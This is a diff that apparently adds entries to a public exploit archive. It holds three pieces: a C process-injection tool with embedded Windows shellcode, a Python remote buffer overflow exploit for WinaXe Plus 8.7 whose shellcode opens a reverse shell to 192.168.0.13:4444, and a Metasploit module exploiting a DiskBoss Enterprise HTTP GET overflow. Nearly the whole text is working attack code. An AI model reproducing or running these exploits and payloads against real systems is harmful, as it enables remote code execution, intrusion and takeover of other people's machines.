+ 1dc: 66 ba 43 05 mov $0x543,%dx
+ 1e0: 8b 1c 96 mov (%rsi,%rdx,4),%ebx
+ 1e3: 48 01 fb add %rdi,%rbx
+ 1e6: 48 83 ec 58 sub $0x58,%rsp
+ 1ea: 48 31 d2 xor %rdx,%rdx
+ 1ed: 48 89 54 24 20 mov %rdx,0x20(%rsp)
+ 1f2: 4c 89 e9 mov %r13,%rcx
+ 1f5: 4c 89 f2 mov %r14,%rdx
+ 1f8: 4d 8b 44 24 08 mov 0x8(%r12),%r8
+ 1fd: 4d 8b 4c 24 10 mov 0x10(%r12),%r9
+ 202: ff d3 callq *%rbx
+ 204: 48 83 f8 01 cmp $0x1,%rax
+ 208: 0f 85 5b ff ff ff jne 169 <__exit>
+ 20e: 66 ba a8 02 mov $0x2a8,%dx
+ 212: 8b 1c 16 mov (%rsi,%rdx,1),%ebx
+ 215: 48 01 fb add %rdi,%rbx
+ 218: 48 31 d2 xor %rdx,%rdx
+ 21b: 48 83 ec 58 sub $0x58,%rsp
+ 21f: 4c 89 e9 mov %r13,%rcx
+ 222: 52 push %rdx
+ 223: 52 push %rdx
+ 224: 41 58 pop %r8
+ 226: 66 ba 40 03 mov $0x340,%dx
+ 22a: 44 8b 0c 96 mov (%rsi,%rdx,4),%r9d
+ 22e: 49 01 f9 add %rdi,%r9
+ 231: 5a pop %rdx
+ 232: 4c 89 74 24 20 mov %r14,0x20(%rsp)
+ 237: 4c 89 44 24 28 mov %r8,0x28(%rsp)
+ 23c: 4c 89 44 24 30 mov %r8,0x30(%rsp)
+ 241: ff d3 callq *%rbx
+ 243: e8 21 ff ff ff callq 169 <__exit>
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+*/
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+#include
+#include
+#include
+#include
+
+
+char shellcode[]="\x4d\x31\xc0\x41\x50\x41\x50\xc7\x04\x24\x65\x78\x70\x6c\xc7\x44\x24\x04\x6f\x72\x65\x72\xc7\x44\x24\x08\x2e\x65\x78\x65\x48\x8d\x0c\x24\x41\x50\x41\x50\x41\x50\xc7\x04\x24\x43\x3a\x5c\x55\xc7\x44\x24\x04\x73\x65\x72\x73\xc7\x44\x24\x08\x5c\x50\x75\x62\xc7\x44\x24\x0c\x6c\x69\x63\x5c\xc7\x44\x24\x10\x69\x6e\x2e\x64\x66\xc7\x44\x24\x14\x6c\x6c\x48\x8d\x14\x24\x66\x41\xb8\x50\x01\x4c\x29\xc4\x4c\x8d\x24\x24\x6a\x18\x41\x58\x49\x89\x0c\x24\x49\x89\x54\x24\x08\x4d\x89\x44\x24\x10\x99\x65\x48\x8b\x42\x60\x48\x8b\x40\x18\x48\x8b\x70\x10\x48\xad\x48\x8b\x30\x48\x8b\x7e\x30\xb2\x88\x8b\x5f\x3c\x48\x01\xfb\x8b\x1c\x13\x48\x01\xfb\x8b\x73\x1c\x48\x01\xfe\x99\x52\x66\xba\x40\x03\x8b\x1c\x96\x48\x01\xfb\xc7\x04\x24\x6d\x73\x76\x63\x66\xc7\x44\x24\x04\x72\x74\x48\x8d\x0c\x24\x48\x83\xec\x58\xff\xd3\x48\x8d\x54\x24\x58\xc7\x02\x73\x74\x72\x63\x66\xc7\x42\x04\x6d\x70\x48\x89\xc1\x66\x41\xb8\x2c\x09\x42\x8b\x1c\x06\x48\x01\xfb\xff\xd3\x49\x89\x44\x24\x18\x66\xba\xf8\x02\x8b\x1c\x16\x48\x01\xfb\x48\x31\xd2\x6a\x02\x59\xff\xd3\x49\x89\xc5\x49\x83\xfd\xff\x74\x60\x66\xba\x30\x01\x41\x89\x54\x24\x20\x66\xba\x60\x0e\x8b\x1c\x16\x48\x01\xfb\x49\x8d\x54\x24\x20\x4c\x89\xe9\xff\xd3\x48\x83\xf8\x01\x75\x3d\x48\x31\xd2\x66\xba\x68\x0e\x44\x8b\x3c\x16\x49\x01\xff\x48\x83\xec\x58\x49\x8d\x4c\x24\x4c\x49\x8b\x14\x24\x49\x8b\x5c\x24\x18\xff\xd3\x48\x31\xd2\x48\x39\xd0\x74\x24\x4c\x89\xe9\x49\x8d\x54\x24\x20\x41\xff\xd7\x48\x83\xf8\x01\x74\xd7\xc9\xc3\x48\x31\xd2\x52\x66\xba\xa4\x04\x8b\x1c\x16\x48\x01\xfb\x59\xff\xd3\x48\x31\xd2\x52\x41\x5a\x66\x41\xba\x0c\x0e\x42\x8b\x1c\x16\x48\x01\xfb\x52\x59\x45\x8b\x44\x24\x28\xb9\x0a\x80\x84\x1e\x81\xe9\x0b\x70\x65\x1e\xff\xd3\x49\x89\xc5\x49\x83\xfd\xff\x74\xc0\x66\xba\xff\x04\x8b\x1c\x96\x48\x01\xfb\x48\x83\xec\x58\x4c\x89\xe9\x48\x31\xd2\x4d\x8b\x44\x24\x10\x66\x41\xb9\xff\x2f\x49\xff\xc1\xc6\x44\x24\x20\x04\xff\xd3\x49\x89\xc6\x48\x31\xd2\x48\x39\xd0\x74\x8d\x66\xba\x43\x05\x8b\x1c\x96\x48\x01\xfb\x48\x83\xec\x58\x48\x31\xd2\x48\x89\x54\x24\x20\x4c\x89\xe9\x4c\x89\xf2\x4d\x8b\x44\x24\x08\x4d\x8b\x4c\x24\x10\xff\xd3\x48\x83\xf8\x01\x0f\x85\x5b\xff\xff\xff\x66\xba\xa8\x02\x8b\x1c\x16\x48\x01\xfb\x48\x31\xd2\x48\x83\xec\x58\x4c\x89\xe9\x52\x52\x41\x58\x66\xba\x40\x03\x44\x8b\x0c\x96\x49\x01\xf9\x5a\x4c\x89\x74\x24\x20\x4c\x89\x44\x24\x28\x4c\x89\x44\x24\x30\xff\xd3\xe8\x21\xff\xff\xff";
+
+
+void inject(DWORD );
+int main(int i,char *a[])
+{
+ if(i!=2)
+ {
+ printf("Usage %s ",a[0]);
+ return 0;
+ }
+
+ BOOL f=0;
+ HANDLE snap;
+ PROCESSENTRY32 pe32;
+
+ snap=CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS,0);
+
+ if(snap==INVALID_HANDLE_VALUE)
+ {
+ printf("CreateToolhelp32Snapshot() Failed."); return 0;
+ }
+
+ pe32.dwSize=sizeof(pe32);
+
+ if(!Process32First(snap,&pe32))
+ {
+ printf("Process32First() Failed."); return 0;
+ }
+
+
+
+ do
+ {
+ if(0==strncmp(a[1],pe32.szExeFile,strlen(pe32.szExeFile)))
+ {
+ f=TRUE;
+ break;
+ }
+
+ }while(Process32Next(snap,&pe32));
+
+
+ if(!f)
+ {
+ printf("No infomation found about \"%s\" ",a[1]);
+ }
+ else
+ {
+ printf("Program name:%s\nProcess id: %d",pe32.szExeFile,pe32.th32ProcessID);
+ printf("\nInjecting shellcode");
+ inject(pe32.th32ProcessID);
+ }
+
+
+
+ return 0;
+
+}
+
+
+
+void inject(DWORD pid)
+{
+ HANDLE phd,h;
+ LPVOID shell;
+
+ phd=OpenProcess(PROCESS_ALL_ACCESS,0,pid);
+
+ if(phd==INVALID_HANDLE_VALUE)
+ {
+ printf("\nOpenProcess() Failed."); return ;
+ }
+
+ shell=VirtualAllocEx(phd,0,sizeof(shellcode),MEM_COMMIT,PAGE_EXECUTE_READWRITE);
+ if(shell==NULL)
+ {
+ printf("\nVirtualAllocEx() Failed"); return ; CloseHandle(phd);
+ }
+
+ WriteProcessMemory(phd,shell,shellcode,sizeof(shellcode),0);
+ printf("\nInjection successfull\n");
+ printf("Running Shellcode......\n");
+
+ h=CreateRemoteThread(phd,NULL,2046,(LPTHREAD_START_ROUTINE)shell,NULL,0,0);
+ if(h==NULL)
+ {
+ printf("Failed to Run Shellcode\n"); return ;
+ }
+}
+
+
+
+
+
+
+
diff --git a/platforms/windows/remote/41073.py b/platforms/windows/remote/41073.py
new file mode 100755
index 000000000..67a604562
--- /dev/null
+++ b/platforms/windows/remote/41073.py
@@ -0,0 +1,64 @@
+# Exploit Title: WinaXe Plus 8.7 - lpr remote buffer overflow
+# Date: 2017-01-16
+# Exploit Author: Peter Baris
+# Exploit link: http://www.saptech-erp.com.au/resources/winaxe_lpr.zip
+# Software Link: http://www.labf.com/download/winaxep-ok.html
+# Version: 8.7
+# Tested on: Windows Server 2008 R2 x64, Windows 7 SP1 x64, Windows 10 Pro x64, Windows Server 2012 R2 x64, Windows Server 2016 x64
+#Start the fake LPD daemon -> Add the network printer -> Close
+
+import socket
+
+# WinAxe Plus 8.7 - lpr remote buffer overflow
+# Author: Peter Baris
+# Tested on Windows Server 2008 R2 x64, Windows 7 SP1 x64, Windows 10 Pro x64, Windows Server 2012 R2 x64, Windows Server 2016 x64
+
+#reverse shell to 192.168.0.13 port 4444, length: 351 bytes, bad characters \x00\x0a\x0d
+shell = ("\xb8\xb1\x79\xd9\xb5\xdb\xdc\xd9\x74\x24\xf4\x5b\x33\xc9\xb1"
+"\x52\x83\xeb\xfc\x31\x43\x0e\x03\xf2\x77\x3b\x40\x08\x6f\x39"
+"\xab\xf0\x70\x5e\x25\x15\x41\x5e\x51\x5e\xf2\x6e\x11\x32\xff"
+"\x05\x77\xa6\x74\x6b\x50\xc9\x3d\xc6\x86\xe4\xbe\x7b\xfa\x67"
+"\x3d\x86\x2f\x47\x7c\x49\x22\x86\xb9\xb4\xcf\xda\x12\xb2\x62"
+"\xca\x17\x8e\xbe\x61\x6b\x1e\xc7\x96\x3c\x21\xe6\x09\x36\x78"
+"\x28\xa8\x9b\xf0\x61\xb2\xf8\x3d\x3b\x49\xca\xca\xba\x9b\x02"
+"\x32\x10\xe2\xaa\xc1\x68\x23\x0c\x3a\x1f\x5d\x6e\xc7\x18\x9a"
+"\x0c\x13\xac\x38\xb6\xd0\x16\xe4\x46\x34\xc0\x6f\x44\xf1\x86"
+"\x37\x49\x04\x4a\x4c\x75\x8d\x6d\x82\xff\xd5\x49\x06\x5b\x8d"
+"\xf0\x1f\x01\x60\x0c\x7f\xea\xdd\xa8\xf4\x07\x09\xc1\x57\x40"
+"\xfe\xe8\x67\x90\x68\x7a\x14\xa2\x37\xd0\xb2\x8e\xb0\xfe\x45"
+"\xf0\xea\x47\xd9\x0f\x15\xb8\xf0\xcb\x41\xe8\x6a\xfd\xe9\x63"
+"\x6a\x02\x3c\x23\x3a\xac\xef\x84\xea\x0c\x40\x6d\xe0\x82\xbf"
+"\x8d\x0b\x49\xa8\x24\xf6\x1a\x17\x10\xf8\xd7\xff\x63\xf8\xf6"
+"\xa3\xea\x1e\x92\x4b\xbb\x89\x0b\xf5\xe6\x41\xad\xfa\x3c\x2c"
+"\xed\x71\xb3\xd1\xa0\x71\xbe\xc1\x55\x72\xf5\xbb\xf0\x8d\x23"
+"\xd3\x9f\x1c\xa8\x23\xe9\x3c\x67\x74\xbe\xf3\x7e\x10\x52\xad"
+"\x28\x06\xaf\x2b\x12\x82\x74\x88\x9d\x0b\xf8\xb4\xb9\x1b\xc4"
+"\x35\x86\x4f\x98\x63\x50\x39\x5e\xda\x12\x93\x08\xb1\xfc\x73"
+"\xcc\xf9\x3e\x05\xd1\xd7\xc8\xe9\x60\x8e\x8c\x16\x4c\x46\x19"
+"\x6f\xb0\xf6\xe6\xba\x70\x06\xad\xe6\xd1\x8f\x68\x73\x60\xd2"
+"\x8a\xae\xa7\xeb\x08\x5a\x58\x08\x10\x2f\x5d\x54\x96\xdc\x2f"
+"\xc5\x73\xe2\x9c\xe6\x51")
+
+
+
+#100299DD - CALL ESP in xwpdllib.dll
+buffer="A"*512+"\xdd\x99\x02\x10"+"\x90"*32+shell
+port = 515
+s = socket.socket()
+ip = '0.0.0.0'
+s.bind((ip, port))
+s.listen(5)
+
+print 'Listening on LPD port: '+str(port)
+
+while True:
+ conn, addr = s.accept()
+ conn.send(buffer)
+ conn.close()
+
+
+
+
+
+
+
diff --git a/platforms/windows/remote/41079.rb b/platforms/windows/remote/41079.rb
new file mode 100755
index 000000000..cf7778bb2
--- /dev/null
+++ b/platforms/windows/remote/41079.rb
@@ -0,0 +1,131 @@
+##
+# This module requires Metasploit: http://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+
+class MetasploitModule < Msf::Exploit::Remote
+ Rank = ExcellentRanking
+
+ include Msf::Exploit::Remote::Seh
+ include Msf::Exploit::Remote::HttpClient
+
+ def initialize(info = {})
+ super(update_info(info,
+ 'Name' => 'DiskBoss Enterprise GET Buffer Overflow',
+ 'Description' => %q{
+ This module exploits a stack-based buffer overflow vulnerability
+ in the web interface of DiskBoss Enterprise v7.5.12 and v7.4.28,
+ caused by improper bounds checking of the request path in HTTP GET
+ requests sent to the built-in web server. This module has been
+ tested successfully on Windows XP SP3 and Windows 7 SP1.
+ },
+ 'License' => MSF_LICENSE,
+ 'Author' =>
+ [
+ 'vportal', # Vulnerability discovery and PoC
+ 'Gabor Seljan' # Metasploit module
+ ],
+ 'References' =>
+ [
+ ['EDB', '40869']
+ ],
+ 'DefaultOptions' =>
+ {
+ 'EXITFUNC' => 'thread'
+ },
+ 'Platform' => 'win',
+ 'Payload' =>
+ {
+ 'BadChars' => "\x00\x09\x0a\x0d\x20",
+ 'Space' => 2000
+ },
+ 'Targets' =>
+ [
+ [
+ 'Automatic Targeting',
+ {
+ 'auto' => true
+ }
+ ],
+ [
+ 'DiskBoss Enterprise v7.4.28',
+ {
+ 'Offset' => 2471,
+ 'Ret' => 0x1004605c # ADD ESP,0x68 # RETN [libpal.dll]
+ }
+ ],
+ [
+ 'DiskBoss Enterprise v7.5.12',
+ {
+ 'Offset' => 2471,
+ 'Ret' => 0x100461da # ADD ESP,0x68 # RETN [libpal.dll]
+ }
+ ]
+ ],
+ 'Privileged' => true,
+ 'DisclosureDate' => 'Dec 05 2016',
+ 'DefaultTarget' => 0))
+ end
+
+ def check
+ res = send_request_cgi(
+ 'method' => 'GET',
+ 'uri' => '/'
+ )
+
+ if res && res.code == 200
+ if res.body =~ /DiskBoss Enterprise v7\.(4\.28|5\.12)/
+ return Exploit::CheckCode::Vulnerable
+ elsif res.body =~ /DiskBoss Enterprise/
+ return Exploit::CheckCode::Detected
+ end
+ else
+ vprint_error('Unable to determine due to a HTTP connection timeout')
+ return Exploit::CheckCode::Unknown
+ end
+
+ Exploit::CheckCode::Safe
+ end
+
+ def exploit
+ mytarget = target
+
+ if target['auto']
+ mytarget = nil
+
+ print_status('Automatically detecting the target...')
+
+ res = send_request_cgi(
+ 'method' => 'GET',
+ 'uri' => '/'
+ )
+
+ if res && res.code == 200
+ if res.body =~ /DiskBoss Enterprise v7\.4\.28/
+ mytarget = targets[1]
+ elsif res.body =~ /DiskBoss Enterprise v7\.5\.12/
+ mytarget = targets[2]
+ end
+ end
+
+ if !mytarget
+ fail_with(Failure::NoTarget, 'No matching target')
+ end
+
+ print_status("Selected Target: #{mytarget.name}")
+ end
+
+ sploit = make_nops(21)
+ sploit << payload.encoded
+ sploit << rand_text_alpha(mytarget['Offset'] - payload.encoded.length)
+ sploit << [mytarget.ret].pack('V')
+ sploit << rand_text_alpha(2500)
+
+ send_request_cgi(
+ 'method' => 'GET',
+ 'uri' => sploit
+ )
+ end
+end
\ No newline at end of file